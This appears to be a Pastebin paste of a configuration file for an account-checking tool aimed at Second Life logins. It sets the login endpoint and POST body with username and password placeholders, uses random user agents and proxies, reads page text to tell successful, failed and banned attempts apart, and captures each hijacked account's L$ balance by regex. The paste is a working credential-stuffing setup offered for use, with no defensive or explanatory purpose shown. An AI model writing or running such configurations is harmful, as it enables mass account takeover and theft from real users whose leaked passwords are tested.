Advertisement
Guest User

Untitled

a guest
May 12th, 2016
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # All fields are case-sensitive
  2. [Settings]
  3. capture=1
  4. proxyless=0
  5. # Timeout in seconds
  6. timeout=10
  7. # Url of login form, used for session and cookie data
  8. BaseURL=http://secondlife.com/my/account/login.php?nextpage=https://secondlife.com/index.php
  9. # Use a random UserAgent from config.cfg in the base directory
  10. useRandomUserAgents=1
  11. useCustomCookies=0
  12.  
  13. [LoginData]
  14. # URL to POST to...
  15. postURL=https://id.secondlife.com/openid/loginsubmit
  16. # Data to POST
  17. postData=username=<USER>&password=<PASS>&Submit=&return_to=https%3A%2F%2Fsecondlife.com%2Fauth%2Foid_return.php%3Fredirect%3Dhttps%253A%252F%252Fsecondlife.com%252Findex.php&previous_language=en_US&language=en_US&show_join=True&from_amazon=
  18. # Headers to include in POST
  19. headers=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Encoding: gzip, deflate, br|Accept-Language: en-US,en;q=0.5|Connection: keep-alive|Host: id.secondlife.com|Referer: https://id.secondlife.com/openid/login?return_to=https%3A%2F%2Fsecondlife.com%2Fauth%2Foid_return.php%3Fredirect%3Dhttps%253A%252F%252Fsecondlife.com%252Findex.php&language=en-US|User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)) Gecko/20100101 Firefox/46.0|Content-Type: application/x-www-form-urlencoded
  20.  
  21. #
  22. cookies=
  23.  
  24. [Keywords]
  25. #
  26. checkHeaderSuccess=0
  27. checkHeaderFail=0
  28. checkHeaderBan=0
  29. checkHeaderRetry=0
  30. #
  31. headerSuccess=
  32. headerFail=
  33. headerBan=
  34. headerRetry=
  35. #
  36. checkSourceSuccess=1
  37. checkSourceFail=1
  38. checkSourceBan=1
  39. checkSourceRetry=0
  40. #
  41. sourceSuccess=<title>OpenId transaction in progress</title>
  42. sourceFail=It looks like the username or password that you entered were incorrect
  43. sourceBan=Too many failed attempts.
  44. sourceRetry=
  45.  
  46. [DataCapture]
  47. # URL to visit in the session, where data that needs to be captured is present.
  48. captureURL=https://secondlife.com/my/account/?lang=en-US
  49. # use regex to retrieve data, seperate with pipe '|'
  50. captureFields=L$ (.*)</font>
  51.  
  52. [CustomCode]
  53. # For a future update to include your own custom code, such as a secret key that needs to posted, and is generated by a piece of javascript
  54. # This will probably be all in javascript or maybe python.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement